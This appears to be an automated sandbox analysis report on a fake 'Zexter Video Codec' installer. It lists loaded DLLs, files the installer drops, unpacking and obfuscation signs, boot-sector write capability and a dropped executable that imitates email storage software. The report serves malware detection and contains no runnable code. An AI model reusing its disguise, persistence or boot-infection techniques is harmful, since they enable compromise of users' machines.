        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpWindow found: window name: TMainFormJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Zexter Video Codec_is1Jump to behavior
        Source: L9rm7AX4mp.exeStatic file information: File size 8333974 > 1048576
        Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: L9rm7AX4mp.tmp, 00000001.00000002.3288367581.0000000002383000.00000002.00000001.01000000.00000006.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039453112.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039392721.000000000209C000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287918641.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, _isdecmp.dll.1.dr

        Data Obfuscation

        barindex
        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeUnpacked PE file: 3.2.zextervideocodec32_64.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeUnpacked PE file: 3.2.zextervideocodec32_64.exe.400000.0.unpack
        Source: is-JTN8Q.tmp.1.drStatic PE information: 0x6C5714D0 [Sat Aug 7 13:44:48 2027 UTC]
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502AC
        Source: is-JTN8Q.tmp.1.drStatic PE information: section name: /4
        Source: is-BA0AN.tmp.1.drStatic PE information: section name: /4
        Source: is-MJPNF.tmp.1.drStatic PE information: section name: /4
        Source: is-2DT7G.tmp.1.drStatic PE information: section name: /4
        Source: is-MMD8V.tmp.1.drStatic PE information: section name: /4
        Source: is-TNU6F.tmp.1.drStatic PE information: section name: /4
        Source: is-4GU98.tmp.1.drStatic PE information: section name: /4
        Source: is-6S03E.tmp.1.drStatic PE information: section name: /4
        Source: is-6DO3I.tmp.1.drStatic PE information: section name: /4
        Source: is-7G2MG.tmp.1.drStatic PE information: section name: /4
        Source: is-65SGC.tmp.1.drStatic PE information: section name: /4
        Source: is-I8TQ0.tmp.1.drStatic PE information: section name: /4
        Source: is-OMDJC.tmp.1.drStatic PE information: section name: /4
        Source: is-H2J0H.tmp.1.drStatic PE information: section name: /4
        Source: is-D169I.tmp.1.drStatic PE information: section name: /4
        Source: is-MI7QU.tmp.1.drStatic PE information: section name: /4
        Source: is-4BT74.tmp.1.drStatic PE information: section name: /4
        Source: is-MVKEA.tmp.1.drStatic PE information: section name: /4
        Source: is-ILE5I.tmp.1.drStatic PE information: section name: /4
        Source: is-2TIQ1.tmp.1.drStatic PE information: section name: /4
        Source: is-PM61J.tmp.1.drStatic PE information: section name: /4
        Source: is-O9QDL.tmp.1.drStatic PE information: section name: /4
        Source: is-FLD95.tmp.1.drStatic PE information: section name: /4
        Source: is-S5KF0.tmp.1.drStatic PE information: section name: /4
        Source: is-QACPG.tmp.1.drStatic PE information: section name: /4
        Source: is-4PKG7.tmp.1.drStatic PE information: section name: /4
        Source: is-G59D3.tmp.1.drStatic PE information: section name: /4
        Source: is-9G1LK.tmp.1.drStatic PE information: section name: /4
        Source: is-MOHPK.tmp.1.drStatic PE information: section name: /4
        Source: is-61SBR.tmp.1.drStatic PE information: section name: /4
        Source: is-FGQU3.tmp.1.drStatic PE information: section name: /4
        Source: is-4SCDL.tmp.1.drStatic PE information: section name: /4
        Source: is-OCNI8.tmp.1.drStatic PE information: section name: /4
        Source: is-4L8QF.tmp.1.drStatic PE information: section name: /4
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00409954 push 00409991h; ret 1_2_00409989
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0040A04F push ds; ret 1_2_0040A050
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0040A023 push ds; ret 1_2_0040A04D
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00460088 push ecx; mov dword ptr [esp], ecx1_2_0046008C
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004062CC push ecx; mov dword ptr [esp], eax1_2_004062CD
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0049467C push ecx; mov dword ptr [esp], ecx1_2_00494681
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx1_2_004106E5
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00412938 push 0041299Bh; ret 1_2_00412993
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx1_2_0040D03A
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004850AC push ecx; mov dword ptr [esp], ecx1_2_004850B1
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00443450 push ecx; mov dword ptr [esp], ecx1_2_00443454
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx1_2_0040F59A
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00459634 push 00459678h; ret 1_2_00459670
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004517E4 push 00451817h; ret 1_2_0045180F
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004519A8 push ecx; mov dword ptr [esp], eax1_2_004519AD
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00483A08 push 00483AF7h; ret 1_2_00483AEF
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00477A24 push ecx; mov dword ptr [esp], edx1_2_00477A25

        Persistence and Installation Behavior

        barindex
        Contains functionality to infect the boot sector
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_00401A4F
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02BCF879
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-4BT74.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-OCNI8.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-MJPNF.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\liblcms2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libpangomm-1.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-I8TQ0.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-6S03E.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-G59D3.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-6DO3I.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libpangoft2-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libjpeg-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-FGQU3.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libstdc++-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libgdk-win32-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-4L8QF.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-65SGC.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-H2J0H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libgobject-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-O9QDL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\uninstall\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-D169I.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-4GU98.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\liblzma-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libxml2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-QACPG.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-4SCDL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-BA0AN.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libfreetype-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libglibmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libsigc-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-9G1LK.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-MOHPK.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-OMDJC.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-7G2MG.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libtiff-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libharfbuzz-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_RegDLL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-61SBR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libglib-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libiconv-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libgomp-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-FLD95.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-MVKEA.tmpJump to dropped file
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeFile created: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-MMD8V.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libgdk_pixbuf-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\librsvg-2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-ILE5I.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libwinpthread-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libgio-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libpng16-16.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-S5KF0.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libpangocairo-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libpango-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libgiomm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_isdecmp.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-2TIQ1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\zlib1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\uninstall\is-1611L.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libgraphite2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-4PKG7.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libpixman-1-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-MI7QU.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-2DT7G.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libpcre-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-JTN8Q.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-TNU6F.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libpangowin32-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\is-PM61J.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libgdkmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeFile created: C:\ProgramData\EMAIL Safe Storage 10.2.46\EMAIL Safe Storage 10.2.46.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video Codec\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeFile created: C:\ProgramData\EMAIL Safe Storage 10.2.46\EMAIL Safe Storage 10.2.46.exeJump to dropped file

        Boot Survival

        barindex
        Contains functionality to infect the boot sector
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_00401A4F
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02BCF879
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_00402199 lstrcmpiW,StartServiceCtrlDispatcherA,lstrcmpiW,3_2_00402199
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,1_2_004241EC
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004241A4 IsIconic,SetActiveWindow,1_2_004241A4
